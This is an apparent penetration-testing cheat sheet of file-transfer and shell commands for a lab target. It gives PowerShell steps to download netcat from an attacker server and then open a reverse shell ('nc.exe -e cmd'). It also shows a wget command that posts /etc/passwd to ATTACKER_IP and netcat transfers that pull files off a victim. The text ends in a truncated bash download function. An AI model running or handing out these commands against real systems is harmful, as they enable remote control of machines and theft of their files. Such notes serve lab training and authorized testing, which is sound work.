Download And Execute a file using Powershell: on Kali: python -m SimpleHTTPServer 8001 on Target: powershell Invoke-WebRequest -Uri 10.10.14.35:8001/nc.exe -OutFile C:\Users\Administrator\downloads\nc.exe On Kali: nc -nvlp 9001 On Target: C:\users\administrator\downloads\nc.exe -e cmd 10.10.14.35 9001 Sending a file from Victim to Attacker using WGET (Not tested) wget --post-file=/etc/passwd ATTACKER_IP:8001 nc -nvlp 9001 Send a File From Kali To Victim nc -nlvp 9001 < exploit.c --> Transfer files from Kali nc YourIpAddress 8001 > /tmp/exploit.c --> Get the file On Target Machine Get a File From Victim to Kali on Kali: nc -l -p 8001 > filefoldername on victim: nc -w 5 10.10.14.14 8001 < /usr/local/bin/filename Downloading a file with just Bash #paste the below command in the terminal function __curl() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"...
Way to Divergence